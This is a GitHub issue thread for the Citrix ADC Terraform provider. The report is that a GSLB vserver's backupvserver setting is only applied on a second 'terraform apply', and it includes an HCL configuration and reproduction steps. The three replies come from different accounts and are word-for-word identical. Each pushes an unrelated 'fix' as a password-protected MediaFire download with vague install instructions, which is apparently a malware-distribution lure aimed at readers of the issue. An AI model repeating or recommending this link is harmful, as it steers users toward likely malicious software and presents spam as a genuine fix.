### ISSUE TITLE
[Bug]: GSLB backup vserver not configured on first attempt

### ISSUE THREAD

**Issue by gusmb** [citrix/terraform-provider-citrixadc#1196]
### Terraform Core Version

1.8.5

### citrixadc Provider Version

1.39.0

### Operating system

RHEL7

### Affected Resource(s)

* citrixadc_gslbvserver

### Equivalent NetScaler CLI Command

add gslb vserver <name> [ < other params > ] -backupVServer <name>

### Expected Behavior

Return terraform state with the expected backupvserver config

### Actual Behavior

Terraform state shows:

backupvserver          = null

Only after running "terraform apply" a second time, the backupvserver field is populated

### Terraform Configuration Files

```hcl
resource "citrixadc_gslbvserver" "gslb-1" {
  provider        = citrixadc.PARTITION
  name            = "GV_VSERVER1"
  state           = "ENABLED"
  edr             = "ENABLED"
  mir             = "DISABLED"
  lbmethod        = "ROUNDROBIN"
  persistencetype = "NONE"
  servicetype     = "TCP"
}

resource "citrixadc_gslbvserver" "gslb-2" {
  provider        = citrixadc.PARTITION
  name            = "GV_VSERVER2"
  state           = "ENABLED"
  edr             = "ENABLED"
  mir             = "DISABLED"
  lbmethod        = "ROUNDROBIN"
  persistencetype = "NONE"
  backupvserver   = "GV_VSERVER1"
  servicetype     = "TCP"
  depends_on      = [citrixadc_gslbvserver.gslb-1]
}
```

### Steps to Reproduce

1. Run terraform apply
2. Terraform state show citrixadc_gslbvserver.gslb-2 shows null value for backup vserver
3. Run terraform apply --> Shows a pending change to configure backupvserver param only
4. Terraform state show citrixadc_gslbvserver.gslb-2 shows the correct state
5. Run terraform apply --> Now there are no changes to the infrastructure

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
